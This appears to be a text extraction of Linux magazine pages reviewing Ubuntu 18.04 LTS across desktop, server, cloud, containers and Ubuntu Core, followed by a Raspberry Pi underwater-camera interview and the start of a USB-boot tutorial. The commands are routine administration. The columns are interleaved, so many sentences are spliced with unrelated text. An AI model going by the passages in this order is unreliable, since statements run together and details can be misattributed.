format, is a growing focus with each Ubuntu Other changes For web developers working on Ubuntu,
If you’re installing the new release from it should be noted that ahead of Python
scratch, you may spot several minor 2’s upstream end of life in 2020, it has
One other side- changes. While the Ubiquity installer is still been removed from the main repositories
used, there are some additional options to
effect of the switch be aware of. The first is the ‘minimal’ option
quick tip
which installs Ubuntu without most of the
to GNOME is that the pre-installed software. This saves around Install Communitheme
500MB, but the resulting install itself is not You can try Communitheme yourself.
login screen is now particularly lightweight, particularly when Use sudo add-apt-repository
compared to some alternative flavours. ppa:communitheme/ppa, sudo apt
powered by GDM When partitioning, you will no longer update then sudo apt install
be prompted to create a swap partition. ubuntu-communitheme-session.
This is because file-based swap is now
release and comes to the fore in 18.04 with used. Finally, Ubuntu 18.04 will collect
increased prominence in the Software data about your Ubuntu flavour, location, and Python 3 is now installed by default.
Centre and a standard set installed hardware, location and so on by default, You will need to enable the ‘universe’
including calculator, characters, logs and with the ability to opt-out if desired. The repository to install the older version in
a system monitor. Snaps are designed to data collected by this method will be this release. Users of the GNOME Boxes
bundle all the dependencies an application anonymous, which has mostly alleviated app will be pleased to learn that ‘spice-
needs, therefore reducing common issues privacy concerns from the community. After vdagent’ is now pre-installed, providing
with missing libraries and the need to installation, you’ll notice significant boot- better performance for Spice clients. This
repack an app as multiple versions for speed improvements in the new release. is an open source project to provide remote
several different distributions. Among the raft of software updates, access to virtual machines in a seamless
Ubuntu 18.04 – which is the first LTS there are some that are particularly worthy way, so you can play videos, record audio,
release to come with ISOs for 64-bit of note, such as the addition of colour emoji share USB devices and share folders
machines only – ships with version 4.15 support (via Noto Color Emoji), GNOME without complications.

Ubuntu Budgie Ubuntu MATE Ubuntu Studio


Users migrating from another OS The MATE desktop uses a Multimedia content creation is the
might find the Budgie desktop a traditional desktop metaphor and focus of Ubuntu Studio, which uses
more familiar experience runs well on hardware like the Pi the same GNOME desktop

Ubuntu Budgie uses the simplicity and The Ubuntu MATE project is effectively the Ubuntu Studio focuses on taking the base
elegance of the Budgie interface to produce continuation of the GNOME 2 project. Its desktop image and configuring it to provide
a traditional desktop-orientated distro with tried-and-tested desktop metaphor is easy best performance for creative pros. It also
a modern paradigm. It’s focused on offering to use, and prebuilt images are provided for includes a default software set suited to
a clean and yet powerful desktop. numerous Raspberry Pi devices. audio, graphics, video and publishing use.

www.linuxuser.co.uk 61
Feature Ubuntu 18.04 LTS

quick guide
Install a 32-bit version

Ubuntu 18.04 is the first release to


offer only a 64-bit full install ISO for
download. If you do need to run on
32-bit hardware (or other alternative
architectures such as ARM), you
have a couple of options. First, you
can simply install the previous LTS
release (16.04.3) and upgrade to the
Above The Subiquity installer brings much-needed improvements to the ease and speed of server installs latest version. Alternatively, you

Ubuntu Server
can use the netboot image. This
tiny image – available in ISO and
USB stick versions together with
the files needed to carry out a PXE
network boot – includes just enough
Server installs are hugely important to Ubuntu of the distribution to be able to
boot from a network to download

W
hile desktop users may be keen to flow of the desktop setup but is tailored to the rest of the required files. When
update to the ‘latest and greatest’, a server environment. launched, the installer prompts
that doesn’t apply to Ubuntu As well as the underlying updates in the for basic network configuration
Server users. Stability is vital in the server desktop release there are several server- including an optional HTTP proxy,
environment and as such it makes sense to specific improvements in Bionic Beaver. language and keyboard preferences,
stay on LTS versions, upgrading only to LXD, the pure container hypervisor, has mirror selection and user details,
point releases and only then upgrading been updated to version 3.0. This release, before installing the distribution as
systems with caution after a new version. which itself is a LTS version with support normal by downloading the required
The first change for server users comes packages on the fly. Another option
early, with a long-overdue installer update. is to make your own custom ISO;
Ubuntu Server now uses Subiquity (aka The first change for Cubic, available via sudo apt-add-
‘Ubiquity for servers’), which finally brings repository ppa:cubic-wizard/
to servers the live-session support and fast Server users comes release && sudo apt install
installation using Curtin (and boy, is it fast!) cubic provides a GUI for this.
that has long been present on the desktop. with a long-overdue
The installer is still text-based as you’d
expect, but is far more pleasant to use. The installer update enabled, improving network latency and
installer does a great job of replicating the throughput. Libvirt, the virtualisation API,
has been updated to version 4, bringing
until June 2023, adds native clustering the latest improvements to this software
right out of the box, physical-to-container designed for automated management of
migration via lxd-p2c, support for Nvidia virtualisation hosts.
runtime passthrough and a host of other If you deal with cloud images, you’ll be
fixes and improvements. QEMU, the open pleased to hear that cloud-init – a set of
source machine emulator and virtualiser, Python scripts and utilities for working with
is updated to version 2.11.1. Meltdown and said images – gets a bump to the very latest
Spectre mitigations are included in the new 18.2 version, with support for additional
release, although using the mitigations clouds, additional Ubuntu modules, Puppet
requires more than just the QEMU version 4 and speed improvements when working
Above You’ll need to use the -d switch to perform upgrade – the process is detailed in a post with Azure. Ubuntu 18.04 also updates
an upgrade before the first LTS point release on the project’s blog. RDMA support is now DPDK (a set of data plane libraries and

62
network interface controller drivers for
fast packet processing) to the latest stable
release branch, 17.11.x. The intention is that
future stable updates to this branch will be
made available to the Ubuntu LTS release by
a SRU (StableReleaseUpdates) model, which
is new to DPDK.
Open vSwitch, the multilayer virtual
switch designed to enable massive network
automation through programmatic extension,
still supports standard management
interfaces and protocols such as NetFlow,
sFlow, IPFIX, RSPAN, CLI, LACP and 802.1ag.
It has been updated to version 2.9, which
includes support for the latest DPDK and the
latest Linux kernel.
Ntpd, for a long time the staple for NTP
time management, is replaced by Chrony
in Ubuntu 18.04. The change was made
to allow the system clock to synchronise quick guide providing the options to install the main
more quickly and accurately, particularly Using the new Subiquity OS, a MAAS Region Controller or a MAAS
in situations when internet access is brief Rack Controller. Network interfaces
or congested, although some legacy NTP The ncurses-based Subiquity installer can be configured with DHCP or static
modes like broadcast clients or multicast is a huge improvement over previous addresses (both IPv4 and IPv6) and as
server/clients are no longer included. versions of Ubuntu and makes installing on the desktop, automatic (full disk) or
Ntpd is still available from the universe the Server distribution a breeze. It should manual partitioning can be used.
be noted, though, that the feature set At this point, installation starts in
is a little limited for some use cases, the background and progress is shown
Ntpd, for a long with no support yet for LVM, RAID or at the bottom of the screen while user
multipath, although these are expected details are entered (including the ability
time the staple for NTP in a future release. After booting the to import SSH identities). A log summary
ISO, Subiquity prompts for language is displayed on screen and a full log can
time management, is and keyboard settings (with automatic be viewed at completion, before selecting
keyboard identification offered) before the reboot option.
replaced by Chrony
a more consistent experience when dealing with a final reboot required for the changes
repository, but as it is subject to only ‘best with multiple systems via MAAS or when to take effect. Note, however, that the above
endeavours’ security updates, its use is not using cloud provisioning via cloud-init. process will only work LTS when the first
generally recommended. Note that systemd- point release drops (that is, 18.04.1). To
timesyncd is installed by default and Chrony When should I upgrade? update before this time, you effectively need
only needs to be used should you wish to If you’ve read through the release notes for to pass the developer switch: sudo do-
take advantage of its enhanced features. Bionic and you’re happy with what’s included, release-upgrade -d. This is an abundance
Bionic marks the end of the LTS road for the upgrade process itself is straightforward: of caution on Canonical’s part, but it is
ifupdown and /etc/network/interfaces. simply update your existing install and run prudent not to upgrade your fleet of servers
Network devices are now configured using sudo do-release-upgrade. Follow through the minute the ISO is available!
netplan and YAML files stored in the on-screen instructions and the updated A sensible approach when performing
/etc/netplan on all new Ubuntu installs. packages will be downloaded and installed, a major upgrade, whether on a server or
Administrators can use netplan ifupdown- a desktop, is to run as full a test cycle
migrate to perform simple migrations on as possible before making changes on a
existing installs. The change quick tip system that is effectively in a production
to netplan is focused No-reboot required for state. This can be easily achieved using a
on making it more updates with Livepatch tool like Clonezilla (https://clonezilla.org) if
straightforward The Canonical Livepatch service that’s feasible, although there are several
to describe enables critical kernel security fixes to alternative approaches if you need to keep
complex be provided without rebooting. It’s free your system running during the process.
network for a small number of devices and is Note that while it is technically possible to
configs, enhanced in Bionic with dynamic MOTD revert from an upgrade, it’s not a particularly
as well as status updates. straightforward process and is therefore not
providing particularly recommended.

www.linuxuser.co.uk 63
Feature Ubuntu 18.04 LTS

Ubuntu Cloud
The Ubuntu push to the cloud gathers pace, with a broad product offering

C
anonical has already highlighted
the importance of Ubuntu Cloud to
its revised strategy as a rapidly
growing revenue stream. Ubuntu is well on
the way to becoming the standard OS for
cloud computing, with 70 per cent of public
cloud workloads and 54 per cent of
OpenStack clouds using the OS.
Canonical has supported OpenStack on
Ubuntu since early 2011, but what exactly is
it? OpenStack is a “cloud operating system
that controls large pools of compute, storage,
and networking resources throughout
a datacentre, all managed through a
dashboard that gives administrators control
while empowering their users to provision
resources through a web interface”.
Getting started with OpenStack for your
own use is straightforward, thanks to a tool Above The ‘conjure-up’ tool includes several pre-packed ‘spells’ for cloud and container deployments
called conjure-up. This is ideal if you want to
quickly build an OpenStack cloud on a single containers are as fast as the native OS which First install LXD using sudo snap install
machine in minutes; in addition, the same means that in the cloud, lxd followed by lxd init and newgrp lxd.
utility can also deploy to public clouds or to a you get subdivided machines without Next, use sudo snap install conjure-
group of four or more physical servers using reduced performance. up –classic and conjure-up to launch
MAAS (Metal As A Service – cloud-style Conjure-up itself is installed as a snap the tool itself. The text-based utility – it’s
provisioning for physical server hardware, package, as is LXD, which will increasingly built for servers, after all – provides a
particularly targeting big data, private cloud, become the Ubuntu way from 18.04 onwards. list of recommended ‘spells’. Spells are
PAAS and HPC). For local use, conjure-up descriptions of how software should be
can use LXD containers against version 3.0 deployed and are made up of YAML files,
of LXD included in Bionic Beaver. The LXD Snap packages will charms and deployment scripts. The main
hypervisor runs unmodified Linux guest conjure-up spells are stored in a GitHub
operating systems with VM-style operations increasingly become registry at https://github.com/conjure-
at uncompromised speed. LXD containers up/spells; however, spells can be hosted
provide the experience of virtual machines the Ubuntu way from anywhere – a GitHub repo location can be
with the security of a hypervisor, but running passed directly to the tool, from which spells
much, much faster. On bare-metal, LXD 18.04 onwards will be loaded. ‘OpenStack with NovaLXD’

quick guide
Use Juju to deploy a service
Juju ‘charms’ provide the easiest cs:elasticsearch. When the
way to simplify deployment and command completes, ElasticSearch
management of specific services. is up! By default, the application
Found at https://jujucharms. port (9200) is only available from the
com, charms cover many different instance itself, but changing this
scenarios including ops, analytics, is as simple as using the command
Apache, databases, network, juju expose elasticsearch. Use
monitoring, security, OpenStack juju status to confirm which ports
and more. Using the ElasticSearch are open. To open all ports, use the
charm as an example, using it is command juju set elasticsearch
as simple as entering juju deploy firewall_enabled=false.

64
is the best spell to start with – you’ll
note spells are also provided for big data quick guide
analysis using Apache Hadoop and Spark, Try Ubuntu in the cloud for free
as well as for Kubernetes.
After selecting the spell, you’ll be Ubuntu offers exciting opportunities for instance. Google Cloud Platform offers
prompted to choose a setup location deploying to the cloud, but due to the $300 credit valid for 12 months, plus, like
(localhost), configure network and storage, pricing models, costs can rack up quickly! Amazon, a free product tier to get you
then provide a public key to enable you to Thankfully, if you want to try out some started. DigitalOcean offers $100 to get
access the newly deployed instance. Accept cloud deployments without spending started with its services and is a great
the default application configuration and any money, a number of providers have alternative to the bigger players. You may
hit ‘Deploy’. Juju Controller – part of Juju, free offerings available. Amazon’s AWS not expect it, but Microsoft’s Azure also
an open source application and service has the best deal, with a free tier that has useful Linux options with £150 credit
modelling tool – will then deploy your providers a server running 24 hours a day valid for 30 days and, once again, its own
configuration. After setup completes, you’ll for a whole year, plus a host of add-on free low-usage tier. All these services
be able to open the OpenStack Dashboard services. Its ‘Lightsail’ offering also are easy to set up and come with Ubuntu
at http://<openstack ip>/horizon and offers a free one-month trial of the basic Server and container images.
login with the default admin/openstack
username and password to see what has

Foundation Cloud
Build is well suited
to redeploying or
cloning existing cloud
architecture
been created. Use the lxc list command
to validate that the system you’ve conjured
up is running.
Canonical also offers BootStack, which
is an ongoing, fully managed private
OpenStack cloud. This is ideal for on- The charms of Juju and manage Ubuntu servers.
premise deployments and is supplemented While conjure-up uses Juju internally, it can Landscape monitors systems
by a lighter-touch service, Foundation also be used directly to model, configure using a management
Cloud Build for Ubuntu OpenStack, where a and manage services for deployment to all agent installed on each
Canonical team will build a highly available major public and private clouds with only machine, which in turn
production cloud, implemented on-site a few commands. Over 300 preconfigured communicates with
in the shortest possible time. Foundation services are available in the Juju store a centralised server
Cloud Build is well suited to redeploying or (known as ‘charms’), which are effectively to send back health
cloning existing cloud architecture. scripts that simplify the deployment and metrics, update
Should you want to manage your own management tasks of specific services. information and other
deployment to public clouds, certified Of course, Juju is free and open source. data for up to 40,000
images are available for AWS, Azure, Google One further piece of the Ubuntu cloud machines. Landscape is
Cloud Platform, Rackspace and many other puzzle is Canonical’s ‘Cloud Native a paid service starting
such services. Platform’, which is a pure Kubernetes at 1¢ per machine per
play. Cloud Native Platform is provided in hour when used as a SaaS
partnership with Rancher Labs and delivers product; however it can be
quick tip a turnkey application-delivery platform, deployed for on-premise use
Set up Landscape built on Ubuntu, Kubernetes and Rancher, on up to 10 machines for free.
Add the PPA: sudo add-apt- a Kubernetes management suite. Although many of the pieces of
repository ppa:landscape/17.03 and After you’ve deployed to the cloud, the cloud software stack are updated
update your package list (sudo apt a common challenge is exactly how you independently of the main OS, inclusion of
update). Install: sudo apt install manage the servers in your infrastructure. these latest technologies in the LTS release
landscape-server-quickstart. Canonical has a tool to help with this in drives forward the possibilities of what can
the form of ‘Landscape’, to deploy, monitor be achieved using the cloud with Ubuntu.

www.linuxuser.co.uk 65
Feature Ubuntu 18.04 LTS

how to
Deploy Kubernetes on
Ubuntu to a cloud provider
Containers
Containers underpin the Ubuntu cloud

1
Install conjure-up
Conjure-up itself is installed
from a snap package using the
command sudo snap install conjure-
up –classic. After installation, use
conjure-up to launch the tool. If you’re
using a pre-snap release, install snapd
first with sudo apt install snapd.

Above Conjure-up can be used to deploy The Canonical Distribution of Kubernetes either locally
or to a supported cloud provider, including all the major players

T
here’s no doubt that containers are system to system and provides advanced
driving innovation in the cloud as a control and passthrough for hardware
logical progression from VMs. resources, including network and storage.
Canonical’s strategy has changed as Of course, LXD is well integrated with
technology has matured, but essentially it is OpenStack and, as a snap package, is easy

2
Select a Kubernetes spell supporting a wide range of technologies to deploy not just on Ubuntu but other Linux
and choose a cloud rather than backing a specific approach. distributions too. Canonical claims LXD’s
After launching conjure-up and LXD is important to Ubuntu (Canonical containers are 25 per cent faster and offer
selecting the ‘The Canonical Distribution founded and currently leads the project),
of Kubernetes’ as your spell, you’ll be with the latest release of the next-generation
prompted to choose a cloud provider. system container manager included in Stable, maintained
Choose ‘new self-hosted controller’ and Ubuntu 18.04. LXD is particularly popular
accept the listed default apps to begin because it offers a user experience that is releases of Docker
the deployment. similar to that of virtual machines while using
Linux containers instead. At its heart LXD is are published and
a privileged daemon which exposes a REST
API. Clients, such as the command -line tool updated by Docker Inc.
provided with LXD itself, then do everything
through that REST API. This means that as snap packages
whether you’re talking to your local host or
a remote server, everything works the same 10 times the density of traditional VMware
way. LXD is secure by design thanks in part ESX or Linux KVM installs, which could
to unprivileged containers and resource translate to a significant cost saving.
restrictions, is scalable for use on your own

3
Connect to and manage laptop or with thousands of Docker Engine on Ubuntu
your Kubernetes container nodes, is intuitive and Canonical’s container offering wouldn’t
After the deployment image-based, be complete without the two current
completes, kubectl (for management) provides an heavyweights – Docker and Kubernetes.
and kubefed (for federation) tools will easy way to Docker Engine is a lightweight container
be installed on your local machine. Use transfer runtime with a fully featured toolset that
kubectl cluster-info to show the images builds and runs your container. Over 65
cluster status and confirm all is good. from per cent of all Docker-based scale-out

66
operations run on Ubuntu.
Stable, maintained releases
of Docker are published and
updated by Docker Inc as
snap packages on Ubuntu,
enabling direct access to
the official Docker Engine
for all Ubuntu users.
Canonical also ensures
global availability of secure
Ubuntu images on Docker
Hub, plus it provides Level 1
and Level 2 technical support
for Docker Enterprise Edition and is
backed by the Docker Inc. company itself
for Level 3 support. Above If deploying using conjure-up, several cloud providers are supported including AWS (pictured),
If you’re at the point where you’re Azure, CloudSigma, Google, Joyent, Oracle and Rackspace
choosing which container technology to try,
it might not be easy to decide between the Native Platform Kubernetes delivered with
above options. Fundamentally, LXD provides Rancher, Canonical has a pure Kubernetes quick tip
a classic virtual machine-like experience offering, known by the rather catchy name Kubernetes with Juju
with all your usual administrative processes of The Canonical Distribution of Kubernetes. Juju can be used to quickly deploy
running, so it feels just like a normal Ubuntu This is pure Kubernetes, tested across Kubernetes Core (a pure Kubernetes/
system. Docker instances, meanwhile, the widest range of clouds and private etcd cluster with no additional
typically contain only a single process or infrastructure with modern metrics and services) or The Canonical Distribution
application per container. monitoring, developed in partnership with of Kubernetes. Use juju deploy
LXD is often used to make ‘Infrastructure Google to ensure smooth operation between cs:bundle/kubernetes-core-292 or
as a Service’ OS-instance deployments Google’s Container Engine (GKE) service juju deploy cs:bundle/canonical-
much faster, whereas Docker is more often with Ubuntu worker nodes and Canonical’s kubernetes-179 respectively.
used by developers to make ‘Platform Distribution of Kubernetes. The stack is
as a Service’ application instances more platform-neutral for use on everything from
portable. Bear in mind that the options are Azure to bare metal, upgrades are frequent fully managed service. Mostly important,
not mutually exclusive – you can run Docker and security updates are automatically Canonical Kubernetes leads in standards
on LXD with no performance impact. applied, a range of enterprise support compliance against the reference
As with Docker, Kubernetes is well options are available, the system is easily implementation.
supported on Ubuntu. As well as the Cloud extensible, and Canonical even offers a Kubernetes uses the same process we
covered earlier for OpenStack courtesy of
conjure-up, only this time you select ‘The
quick guide config file. Next you need to ensure Canonical Distribution of Kubernetes’ in the
Migrate to containers that eth0 is configured for DHCP. options. It’s worth getting a free account at
Finally, to allow OpenStack to inject the somewhere like AWS or Azure to provide a
Ubuntu 18.04 includes LXD 3.0, which has SSH key you must ensure that cloud- standalone cloud test environment.
a new tool called lxd-p2c. This makes it init and curl are installed. With that Deploying containers can be time- and
possible to import a system’s filesystem done, simply create a raw disk image storage-consuming, but one change in
into a LXD container using the LXD API. (use VBoxManage clonehd -raw if Ubuntu 18.04 helps ease the pain. The
After installation, the resulting binary migrating from VirtualBox) and test Bionic Beaver minimal install images have
can be transferred to any system that your image using the kvm command. You been reduced by over 53 per cent in size
you want to turn into a container. Point then just need to upload your image to compared to 14.04, aided by the removal of
it to a remote LXD server and the entire OpenStack, register the image and you over 100 packages and thousands of files.
system’s filesystem will be transferred should be able to start a new instance. Of course, minimal images are just that –
using the LXD migration API and a new only what you need to get a basic install
container created. This tool can be used running and download additional packages
not just on physical machines, but from – but at only 31MB compressed and 81MB
within VMs like VirtualBox or VMware. uncompressed, the images sure are small.
Another alternative migration path In short, snap packages are easing the
is from a physical machine or VM to process of installing much of the container
OpenStack. This is possible, but slightly toolset, a bang up-to-date LTS distro
more involved. First, selinux needs to be improves the experience after deploying
disabled by editing the /etc/selinux/ a container, and Ubuntu’s own ecosystem
additions help with use of major platforms.

www.linuxuser.co.uk 67
Feature Ubuntu 18.04 LTS

Ubuntu Core, IoT & robotics


Ubuntu is spreading its influence, driven by the Ubuntu Core distribution

U
buntu Core is a tiny, transactional security issues are addressed even if the Everything in Ubuntu Core is based
version of Ubuntu designed for IoT device is out in the field. Of course, Ubuntu around digitally signed snaps. The kernel
devices, robotics and large Core is free; it can be distributed at no cost driver and device drivers are packaged
container deployments. It’s based on the with a custom kernel, BSP and your own as a snap. The minimal OS itself is also a
super-secure, remotely upgradeable Linux suite of apps. It has unrivalled reliability, snap. Finally, all apps themselves are also
app packages known as snaps – and it’s with transactional over-the-air updates snaps, ensuring all dependencies are tightly
used by a raft of leading IoT players, from including full rollback features to cut the managed. The whole distribution comes in
chipset vendors to device makers and costs of managing devices in the field. at just 350MB, which is smaller than many
system integrators.
Core uses the same kernel, libraries and Below The current release of ROS, ideal for use on Ubuntu Core, is the 11th version: ‘Lunar Loggerhead’
system software as classic Ubuntu. Snaps
for use with Core can be developed on an
Ubuntu PC just like any other application.
The difference with Core is that it’s been
built with the Internet of Things in mind.
That means it’s secure by default –
automatic updates ensure that any critical

expert opinion
Joshua Elsdon, maker behind
the Micro Robots project
“The primary benefit of ROS for me is
that it allows for easy communication
between different software modules,
even over a network. Further, it allows
the community of robotics designers
a core framework on which they can
open source their contributions.”

how to
Build a new Ubuntu Core image for a Raspberry Pi 3

1 2 3
Create a key to sign uploads Register with Ubuntu Store Create a model assertion
Before starting to build the image, Next, you have to register your key To build an image, you need to
you need to create a key to sign with the Ubuntu Store, linking it to create a model assertion. This is
future store uploads. Generate a key that your account. You will be asked to login with a JSON file which contains a description
will be linked to your Ubuntu Store account your store account credentials – use the of your device with fields such as model,
with snapcraft create-key. Confirm the command snapcraft register-key to start architecture, kernel and so on. Base this on
key with snapcraft list-keys. the process. an existing device and tweak as needed.

68
rival platforms despite its rich feature set.
Most importantly, Ubuntu Core supports classic ubuntu 18.04 ubuntu core 18
a huge range of devices, from the 32-bit
ARM Raspberry Pi 1 and 2 and the 64-bit
Qualcomm ARM DragonBoard 410c to Intel’s
latest range of IoT SoCs. Confined applications packages as a snap with
The process of building a custom Ubuntu dependencies
Core image is straightforward. For new
boards, it’s necessary to create a kernel
snap, gadget snap and a model assertion.
Otherwise, the process involves registering

The kernel driver Minimal OS packaged as snap

and device drivers Kernel 4.15 Kernel 4.15


in Ubuntu Core are
packaged as snaps Clearly defined Kernel and device driver packaged
legend as snap
Application A Application B OS Package Shared library Device library
with Snapcraft (https://snapcraft.io),
creating a signed model-assertion JSON Above Admittedly there will be more snaps in 18.04, but Ubuntu Core 18’s OS and kernel are snaps
document with information about your
hardware which is then signed, and finally as the project then effectively becomes distribution method, but because you know it
running a single command to build the image secure and isolated from the OS underneath, will work on a wide range of platforms.
itself (see below). it’s perfect for this kind of application. The Ubuntu Core version 18 is currently in
Ubuntu Core adoption is growing rapidly process of installing updates is also much development, integrating the latest changes
within the robotics and drone space, thanks smoother than alternative approaches, and improvements from Bionic Beaver.
to ROS (Robot Operating System, www. with updates applied automatically and As well as using version 4.15 of the Linux
ros.org) running on Ubuntu Core. ROS is a transactionally, ensuring the robot is never Kernel, the new release takes advantage
flexible framework for writing robot software broken. This all happens via the free Ubuntu of improvements in the snap system that
that includes tools and libraries for creating store, so there’s no need to host your underpins Core to include snapshot support,
complex yet robust applications. The ROS own infrastructure. Finally, sharing your so that a snap can save data and state at
Wiki includes detailed instructions on ROS application with the world becomes any time. Delta downloads reduce the size of
packaging your ROS project as a snap and, far easier via Snapcraft – not just as a snap updates, which can be scheduled.

4 5 6
Sign the model assertion Build your image Flash and test your creation
Now you need to sign the model Create your image with the You’re now ready to flash and test
assertion with a key. This outputs ubuntu-image tool. The tool your image! Use a tool such as ‘dd’
a model file, the actual assertion document is installed as a snap via snap install or GNOME Multi Writer to write the image
you will use to build your image. Use the --beta ----classic ubuntu-image. Then to a SD card or USB stick and boot it in
command cat pi3-model.json | snap use: sudo ubuntu-image -c beta -O pi3- your device. You’ll be prompted for a store
sign -k default &> pi3.model. test pi3.model. account which downloads the SSH key.

www.linuxuser.co.uk 69
Discover another of our great bookazines
From science and history to technology and crafts, there
are dozens of Future bookazines to suit all tastes
The ESSential guide for Coders & makers
practical
Raspberry Pi

72 “The housing was tricky –


I had many leaks”

Contents

72 Meet PipeCam, the Pi-


powered underwater camera 74 Super-size your Pi 3 B+
storage, we show you how 76 Create your own voice
assistant with Picroft

www.linuxuser.co.uk 71
PiTutorial
Project PipeCam
Minecraft

PipeCam
Using a Pi to keep an eye on the bottom of the ocean
is simpler than you might think – apart from the leaks

S
ometime in 2014, Fred Fourie saw a long- calculations). This freed me up to work on the software
Fred term time-lapse video of corals fighting and electronics.
Fourie with each other for space. That piqued his
interest in the study of bio-fouling, which is Talking of software, what is the PipeCam running?
the accumulation of plants, algae and micro-organisms I use Raspbian Lite as my base OS. I load up apache2
Fred is an such as barnacles. Underwater documentaries such by default on most projects so I can host ‘quick look’
electronics as Chasing Coral and Blue Planet II further drove diagnostic pages as I tinker. On the PipeCam I installed
technician for an his curiosity, and, inspired by the OpenROV project, i2c-tools to set up my hardware clock to keep track of
engineering firm Fred decided to build an affordable camera rig using time on longer deployments. I set up my USB drives to
in Cape Town, inexpensive and easily sourceable components. This be auto-mounted to a specific location. For this
South Africa, that he later dubbed PipeCam; head to the project’s page I use the blkid to the drive information, and then add
specialises in (https://hackaday.io/project/21222-pipecam-low-cost- them to the system by editing the /etc/fstab with the
marine sciences. underwater-camera) to read detailed build logs and drive details and desired location. The main script is
view the results of underwater tests. written in Python, as it’s my home language. The script
Like it? checks which drive has enough space to record, and
Are power and storage two of the most crucial depending on the selected mode (video or photo) it then
Fred has done elements for remote builds such as the PipeCam? starts the recording or photo-taking process. The script
construction It has been a bit of an ongoing challenge. Initially, outputs some basic info which I log from the cron call,
projects in the I wanted to solve my power issues by making the which is where I set up my recording interval. It’s not
Antarctic and PipeCam a tethered system, but difficulties in getting complicated stuff.
has worked on
space weather on Any particular reason for using the Raspberry Pi?
remote islands. I know my way around a Linux system far better than
He gets excited Without a good I know microcontrollers. The familiarity of the Pi
about biological environment made quick setup and experimentation
sciences and large underwater housing the possible. Also, the community support is excellent.
datasets. Follow
his adventures on project is… well, literally How do you plan to extend the project?
Twittter at So far the results have been pretty promising.
@FredFourie. dead in the water Ultimately the next iteration will aim to increase user-
friendliness and endurance. To achieve this there are
Further three sets of modifications I aim to add:
reading a cable into the watertight hull made me turn to a self- • Make use of the Pi’s GPIO to add settings buttons
contained, battery-powered unit. In the first iterations, • Host a user interface webpage on the Pi itself, for
Fred is interested I had a small rechargeable lead acid battery and a system health checks
in areas where Raspberry Pi 3, but the current version sports a Pi Zero • Integrate some battery monitoring with use of current-
the natural world with a Li-ion power bank. This gives me more than five and voltage-sensing circuits, with an light dependent
and electronics times the power capacity for a reasonable price. With resistor (LDR) to determine if there’s enough light to
meet. He’s also regards to storage space, I’ve opted for a small bare- take a picture.
been tinkering bones USB hub to extend the space with flash drives.
with machine There are a few nice Raspberry Pi Zero HATs for this. Could you explain the Fritzing schematic you’ve shared
learning and on the project page?
object detection What was the most challenging part of the project? The next iteration is all about reducing the power used
and suggests Definitely the underwater housing: I had many leaks. in idle times. In the circuit you can see that the main
there might be The electronics are all off-the-shelf and the online power to the Raspberry Pi is controlled via a relay from
some crossover communities has made finding references for the a Arduino Nano. The Nano takes inputs from a current
in the future software that I wrote a breeze, but without a good sensor, voltage sensor and LDR, and decides from these
with using object underwater housing the project is… well, literally inputs whether the Pi should be switched on. In addition
detection. Follow dead in the water. As of the start of the year I got a to the RTC on the Pi, you’ll also see a BME280 breakout
his projects at friend onboard, Dylan Thomson, to help me with the board to monitor pressure, temperature and humidity,
https://hackaday. mechanical parts of the project. Dylan has a workshop to detect changes associated with leaks. There’s also a
io/FredWFourie. with equipment to pressure-test housings (and my slide switch to select video or photo mode.

72
Floating brain
Fred first used a Pi 3 and Waterproof chassis
then a Pi 2 before switching The PVC pipe and the end
to the Pi Zero to reduce caps protect the electronics
power consumption. A cron from the elements. The leak-
job on the Pi calls a Python proof housing has a 10mm
script to check available Perspex lens that withstands
space on the attached USB four bars of pressure.
drives, and if all’s okay,
it then snaps a picture or
records a video.

Fuel
The system currently has no real power
management, which Fred admits is a
shortcoming that he hopes to remedy
soon using an Arduino Nano. For the
time being, the current configuration
allows for a second power bank.

Components list
n Raspberry Pi Zero
n Raspberry Pi Camera Module v2
n USB Hub pHat
n SanDisk Cruzer Blade USB
Data loggers I spy flash drives
SanDisk Cruzer Blade USB The Raspberry Pi camera module has n Power bank
drives plug into the four-port been giving good results and surprised n On/off toggle switch
USB pHAT. statvfs finds the Fred with its underwater performance. n 10mm Plexiglass/Perspex lens
drive with the most free However, the module, with its fiddly n 110mm PVC waste pipe
space every time time the ribbon, isn’t very robust and he fried one n 110mm PVC screw-on end cap
cron job calls on the script. during his tests. n 110mm PVC stop-end

1 2 3

Helping hand A new house There’s more to come


While he started the project alone, Fred The latest iteration of PipeCam – v1.5 – Now that he has finalised the design
asked his friend Dylan to join in earlier this uses a flashy transparent housing with a of the build, the next goal is to test the
year. Dylan handles the mechanical aspect Raspberry Pi sticker. The internal mounting build as much as possible and tweak and
of the project and is in charge of building has also been changed so that the on/off refine settings. Fred also intends to give a
the robust leak-proof housing, while Fred switch and recharge port are accessible PipeCam to a few scientists to test in their
focuses on software and electronics. by simply removing the lens. own fields (or rather water) later this year.

www.linuxuser.co.uk 73
Tutorial Pi 3 B+: USB Booting

Boot your Pi 3 B+ from USB


Configure and boot up your Raspberry Pi 3 B+
using a USB flash or hard drive
Dan 02 Download the latest OS image
You’ll obviously need to install the latest version of
Aldred the OS to make use of this feature, so first open your web
browser and head to www.raspberrypi.org/downloads.
Select the current Raspbian option and download the
Dan is a Raspberry ‘Stretch with Desktop’ image. You can click the link for
Pi enthusiast, Release Notes to see all the updates and changes made to
teacher and the OS with that version. Remember that the file is a zipped
coder who enjoys file, so you need to extract the IMG from the folder. Open it
creating new and drag the file onto your desktop or another folder.
projects and
hacks to inspire
others to start
learning. Currently On 14 March 2018 – often referred to as Pi Day, because
hacking an old the date written in US format is 3.14 – the Raspberry Pi
rotary telephone. Model 3 B+ was released. Among the upgrades were a
new 1.4GHz, 64-bit, quad-core ARM processor, dual-band
Resources 802.11ac wireless and LAN, and Bluetooth 4.2. Faster
Ethernet was added in the form of gigabit Ethernet over
Raspberry Pi 3 B+

microSD card
USB 2.0, and there’s also improved thermal management.
Additional improvements have also been made to booting
from a USB mass-storage device, such as a flash drive or
03 Write the OS to the SD card
Now, write the .img image to the SD card. An
easy method to do this is with Etcher, which can be
hard drive. downloaded from https://etcher.io. Insert your SD card
USB storage This tutorial explains how to take such a device into your computer and wait for it to load. Open Etcher
device and boot up your Raspberry Pi 3 B+ using it. Once and click the first ‘image’ button, select the location of
everything’s configured, there’s no longer any need to the .img file, then click the ‘select drive’ button and select
use an SD card – it can be removed and used in another the drive letter which corresponds to the SD card. Finally,
Raspberry Pi. The benefits of this are that you can click the ‘Flash!’ button to write the image to the card.
increase the overall storage size of the Pi from a standard
